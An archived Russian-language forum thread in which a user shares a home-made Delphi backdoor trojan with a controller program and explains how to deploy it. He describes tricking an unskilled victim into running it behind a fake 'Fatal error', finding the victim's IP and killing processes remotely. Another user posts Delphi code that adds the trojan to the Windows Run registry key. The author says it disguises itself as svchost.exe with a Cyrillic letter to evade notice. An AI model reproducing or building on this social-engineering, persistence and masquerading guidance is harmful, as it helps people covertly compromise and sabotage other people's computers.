Помощь - Поиск - Пользователи - Календарь
Полная версия: Хакерская штучка
Логин: Пароль:

Музей форума Evanescence & Slipknot [зал №2] > Разное > Железо и Интернет
boobl
вчера ночью дописал троян + прогу для управления ей, вот выкладываю на оборзение общества, кто хочет напакостить своему сослуживцу?)
знач так, вот прога: Download
в комплекте лежит mini.exe — это обычный троян.Backdoor, весил 11кило, меньше не смог, Delphi..:/
а также в комплекте есть Project1.exe, эта программа соединяется с программой-вирусом и управляет им

Как пользоваться:

Для начала находим жертву, это может быть человек без особых знаний компьютера и сетей, которому можно будет легко дать сию прогу и сказать «Зацени!!». Жертва запускает программу и немедленно получает «Fatal error», это отвлекающий манёвр, жертва теперь думает что mini.exe неработает и не будет, а на самом деле ещё как работает!
После того как вы знаете кто у вас жертва, вы должны обзавестись каналом связи с ним, а так же нужно обязательно знать его IP адрес в сети.
Запускаем Project1.exe в поле для IP пишем IP жертвы, чуть ниже пишем номер порта вируса, это 40666, и ещё ниже пишем слово «go».
Жмём кнопку Send и молимся, если в поле выше будет выведен нолик, значит жертва не запустила вирус, или его блокировал фаерволл.
В случае успеха, в поле справа появятся все процессы на удалённом компьютере, а также чуть ниже появится кнопка «Kill»;)
Дальше всё просто, выбираем процесс, нажимает Kill, процесс убивается, советую поубивать процесс Explorer.exe, это стандартная оболочка Windows, и после этого у жертвы исчезнет трей, кнопка пуск и т д. системные процессы убить не получится, о чём вирус вам так и скажет. в общем удачи%)
Фикс
на кошках проверил ?
Rioterra
мдя.. напакостить мона серьезно =))))) только ip-адрес не так уж просто у малознакомого выцыганить. начнем с того, что человек, малопонимающий в компах, может и не знать своего ip-адреса.. это бомить надо сразу тех, у кого адрес знаешь =))) молодец.. слушай, расскажи, как ты вообще начал вирусы писать. С чего начинал?
boobl
2 Фикс Канеш проверил%) я вообще удивлён, как этот человек не обиделся на меня посе того, что я там натворил%)

2 Риотерра ну, я считаю что IP адрес не нада спрашивать у жертвы, есть много путей узнавания IP, можно взять миранду, еси человек онлайн то мирандп может показать айпи, можно узнатть IP просмотрев хедер письма, еси ты переписываешься с этим человеком, если речь идёт об irc, тут всё очень просто, /dns <ник_жертвы>
Кстати, это первый вирус в моей жизни, до этого я тока тренился с сетевыми функциями, чаты писал, сканеры.. ща решил попробовать

P.S. Касперский не ловит%)
Фикс
к слову :
Кашперовский и mydoom не ловит, он вообще ничего не ловит, он кривой с рождения, т.к. создатели кащперовского изначально клепали псевдо-вири у себя в каморке и потом якобы выпускали фиксы на свои вири.

Риотерра : не хочешь в сетке поиздевацца над кем нить ? гг
я данное произведение качать не собираюсь =)
т.к. аффтар жжот
Rioterra
Да Касперский ваще хреновенький антивирус.. Он много че не ловит. У меня он после проверки выдавал, что ни одного вируса. А обновила антивирусную базу, так новая прога мне выдала 215 вирусов %)
parabola
качаешь прогу и становишься счастливым обладателем трояна
Фикс
а под крышкой ВНИМАНИЕ, рекламаная акция — второй троян бесплатно ))))
parabola
Цитата(Фикс @ Jun 2 2005, 20:08)
а под крышкой ВНИМАНИЕ, рекламаная акция — второй троян бесплатно ))))
*

это просто сказка,а не предложение
скачай прогу пряма сейчас и можешь покупать себе новый комп,старый уже не вернуть :rofl1:
Фикс
Белые ночи — колись сколько хочешь

перейдем на Х ? ))
parabola
во,я уже вижу,тут есть с кем поопщаться)))
Фикс
=))))
песшы есчо
Slipкот
ААААААААААААА! Звоню в милицию! :))
parabola
Цитата(Slipкот @ Jun 2 2005, 20:38)
ААААААААААААА! Звоню в милицию! :))
*

скажешь:«Коня привели»?
Serg
если бы еще при запуске mini.exe не отображалась в Диспетчере задач, то было б еще лучше...
Serg
Только что сам себя убил :lol:
boobl
Цитата(Se®G)
Только что сам себя убил
*

Кста, я его сильно доработал и приделал ещё одну управляющую прогу..

яхз как сделать чтоб её небыло видно в диспетчере
Serg
Цитата(boobl)
яхз как сделать чтоб её небыло видно в диспетчере
*

Можно впринципе просто придумать ей какое-нибудь беспалевное название, не привлекающее внимание. И добавь код (если еще не добавил), чтобы прога запускалась потом при каждом запуске винды — пример ===>

uses
Registry

procedure TForm1.FormCreate(Sender: TObject);
var
reg: TRegistry;
begin
reg := TRegistry.Create;
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', false);
reg.WriteString('Прога', Application.ExeName);
end;

тогда придется убрать окошко «Fatal error»
boobl
она прописывается в Run с самых ранних версий, а сейчас вообще называется svchost.exe (с русской буквой с) и лежит в system32
Serg
Цитата(boobl)
она прописывается в Run с самых ранних версий
*

Никуда она у меня не прописывается
PSIXOS
А ЧЁ У ТЕБЯ ССЫЛКА НА ВИРУС НЕРАБОТАЕТ?ЗДЕЛАЙ ПОЖАЛУЙСТА ЧТО БЫ РАБОТАЛА :spiteful:
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
Copyright by Invision Power Services